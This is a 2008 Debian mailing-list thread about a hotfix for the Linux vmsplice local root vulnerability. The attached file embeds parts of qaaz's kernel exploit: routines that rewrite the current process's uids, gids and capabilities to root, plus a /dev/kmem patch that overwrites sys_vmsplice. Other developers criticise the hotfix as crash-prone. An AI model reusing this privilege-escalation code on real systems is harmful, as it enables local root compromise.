Bug#464953: Amd64 hotfix

2008-02-11 Thread Kyle McMartin
On Mon, Feb 11, 2008 at 01:54:35PM -0500, Ivan Jager wrote:
> I modified the hotfix so it will also patch compat_sys_vmsplice, which
> would be important on amd64 boxen with x86 compatibility enabled.


these hotfixes are so completely wrong, it's not even funny.
you're playing Russian roulette with the return value.

   0:   b8 da ff ff ff          mov    $0xffffffda,%eax
   5:   c3                      retq

is more correct (return -ENOSYS)
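
(For illustration, a sketch of that payload as C, in the style of the
hotfix's patcher further down; patch_enosys, map, and address are
hypothetical names standing in for the /dev/kmem page mapping and the
symbol address the hotfix already computes.)

#include <string.h>

static void patch_enosys(char *map, unsigned long address)
{
        /* i386: mov $0xffffffda,%eax ; ret   (-ENOSYS == -38) */
        static const unsigned char stub32[] =
                { 0xb8, 0xda, 0xff, 0xff, 0xff, 0xc3 };
        /* amd64: mov $-38,%rax ; ret -- the REX.W encoding sign-extends
         * the immediate, so the negative errno fills all of %rax */
        static const unsigned char stub64[] =
                { 0x48, 0xc7, 0xc0, 0xda, 0xff, 0xff, 0xff, 0xc3 };

#if defined(__x86_64__)
        memcpy(map + (address & 0xfff), stub64, sizeof(stub64));
#else
        memcpy(map + (address & 0xfff), stub32, sizeof(stub32));
#endif
}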

regards, kyle






Bug#464953: Amd64 hotfix

2008-02-11 Thread Ivan Jager
I modified the hotfix so it will also patch compat_sys_vmsplice, which 
would be important on amd64 boxen with x86 compatibility enabled.


It's attached, or if for some reason it doesn't make it through, you can 
fetch it from 
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c


Ivan

/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound     14
#define uint            unsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)        (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void    exit_code();
char    exit_stack[1024 * 1024];

void    die(char *msg, int err)
{
        printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
        fflush(stdout);
        fflush(stderr);
        exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void    exit_kernel()
{
        /* build a fake interrupt frame (SS, ESP, EFLAGS, CS, EIP) on the
         * stack and iret back to user mode, landing in exit_code() */
        __asm__ __volatile__ (
                "movl %0, 0x10(%%esp) ;"
                "movl %1, 0x0c(%%esp) ;"
                "movl %2, 0x08(%%esp) ;"
                "movl %3, 0x04(%%esp) ;"
                "movl %4, 0x00(%%esp) ;"
                "iret"
                : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
                    "i" (USER_CS), "r" (exit_code)
        );
}

static_inline
void *  get_current()
{
        unsigned long curr;
        /* struct thread_info sits at the base of the 8 KiB kernel stack;
         * its first field is the task_struct pointer */
        __asm__ __volatile__ (
                "movl %%esp, %%eax ;"
                "andl %1, %%eax ;"
                "movl (%%eax), %0"
                : "=r" (curr)
                : "i" (~8191)
        );
        return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void    exit_kernel()
{
        /* same trick as the i386 version, with a 64-bit iretq frame and
         * a swapgs to restore the user gs base */
        __asm__ __volatile__ (
                "swapgs ;"
                "movq %0, 0x20(%%rsp) ;"
                "movq %1, 0x18(%%rsp) ;"
                "movq %2, 0x10(%%rsp) ;"
                "movq %3, 0x08(%%rsp) ;"
                "movq %4, 0x00(%%rsp) ;"
                "iretq"
                : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
                    "i" (USER_CS), "r" (exit_code)
        );
}

static_inline
void *  get_current()
{
        unsigned long curr;
        /* the current task_struct pointer lives at offset 0 of the
         * per-cpu PDA, reachable through the kernel gs base */
        __asm__ __volatile__ (
                "movq %%gs:(0), %0"
                : "=r" (curr)
        );
        return (void *) curr;
}

#else
#error unsupported arch
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void    kernel_code()
{
        int     i;
        uint    *p = get_current();

        /* scan the task_struct for the run of four uids followed by four
         * gids, zero them (root), then skip the group_info pointer and
         * raise the three capability sets to full */
        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid &&
                    p[2] == uid && p[3] == uid &&
                    p[4] == gid && p[5] == gid &&
                    p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }

        exit_kernel();
}

void    de_exploit()
{
  char line[4096];
  FILE* ksyms = fopen("/proc/kallsyms", "r");
  size_t address = 0;
  size_t compat_address = 0;

  if(!ksyms)
  {
    perror("Could not open /proc/kallsyms");

    exit(EXIT_FAILURE);
  }

  while(fgets(line, sizeof(line), ksyms))
  {
    /* the leading space keeps " sys_vmsplice" from also matching
       "compat_sys_vmsplice" */
    if(strstr(line, " sys_vmsplice"))
    {
      sscanf(line, "%zx", &address);
    }
    if(strstr(line, " compat_sys_vmsplice"))
    {
      sscanf(line, "%zx", &compat_address);
    }
  }

  if(!address)
  {
    fprintf(stderr, "Address not found\n");

    exit(EXIT_FAILURE);
  }

  int fd = open("/dev/kmem", O_RDWR);

  if(fd == -1)
  {
    perror("open(\"/dev/kmem\")");

    exit(EXIT_FAILURE);
  }

  /* map the page holding sys_vmsplice read-write through /dev/kmem */
  char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
                   address & ~0xFFF);

  if(map == MAP_FAILED)
  {
    perror("mmap");

    exit(EXIT_FAILURE);
  }

  map[address & 0xfff] = 0xc3; /* 0xC3 = RET */

  if (compat_address) {
    printf("Patched sys_vmsplice, now patching compat_sys_vmsplice\n");
    char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
                     compat_address & ~0xFFF);

    if(map == MAP_FAILED)
    {
      perror("mmap");

      exit(EXIT_FAILURE);
    }

    map[compat_address & 0xfff] = 0xc3; /* 0xC3 = RET */
  }
}

Bug#464953: Amd64 hotfix

2008-02-11 Thread Michael Holzt
> I modified the hotfix so it will also patch compat_sys_vmsplice, which
> would be important on amd64 boxen with x86 compatibility enabled.

Once again: the hotfix, and your modification of it, are stupid, stupid,
stupid and dangerous. The hotfix first attempts the exploit itself, and
that corrupts kernel memory. It is very likely that your system will
crash shortly afterwards; numerous people have reported that the hotfix
has exactly that result, either instantly or after a short while.

Also, while overwriting the vmsplice syscall with a ret will prevent
the hole from being abused, it will also confuse software which wants
to use the vmsplice call. At the very least it should return an error.
I'm not sure whether any software in normal use calls vmsplice, but
keep this in mind.
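
(To illustrate: a small, hedged sketch of a legitimate vmsplice() caller.
With an -ENOSYS stub the call fails cleanly; with a bare ret the return
register holds leftover garbage that a caller like this can misread as
success.)

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>      /* vmsplice() is declared here with _GNU_SOURCE */
#include <stdio.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void)
{
        int pfd[2];
        char buf[] = "hello";
        struct iovec iov = { .iov_base = buf, .iov_len = strlen(buf) };

        if (pipe(pfd) == -1) {
                perror("pipe");
                return 1;
        }

        ssize_t n = vmsplice(pfd[1], &iov, 1, 0);
        if (n == -1 && errno == ENOSYS)
                puts("vmsplice disabled cleanly"); /* -ENOSYS stub */
        else if (n == -1)
                perror("vmsplice");
        else
                printf("spliced %zd bytes\n", n);  /* bare ret can land here */
        return 0;
}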

And finally: if you really, really want to use this kind of fix, why
don't you just get rid of all the dangerous exploit code, keep only the
code inside the de_exploit() function, and run that as root (see the
sketch below)? That would do the job without causing memory corruption.
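
(A minimal sketch of that suggestion, assuming the de_exploit() routine
quoted above is kept verbatim in the same file and everything else from
the exploit is dropped; the program is then simply run as root.)

#include <stdio.h>
#include <unistd.h>

void de_exploit();      /* the patch routine from Ivan's file, unchanged */

int main(void)
{
        if (geteuid() != 0) {
                fprintf(stderr, "must run as root (needs /dev/kmem)\n");
                return 1;
        }
        de_exploit();   /* patch only; no exploit step, no corruption */
        puts("vmsplice entry point(s) patched");
        return 0;
}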

But the best fix is still to just install an updated kernel and reboot.
As I said, you will reboot anyway (just at a random time), at least when
using this stupid hotfix, which destroys your kernel memory. There may
be systems which cannot be rebooted right now, but in most cases I feel
that people who want to apply such a hotfix instead of deploying a
clean solution are just lazy.


Regards
Michael

-- 
It's an insane world, but I'm proud to be a part of it. -- Bill Hicks


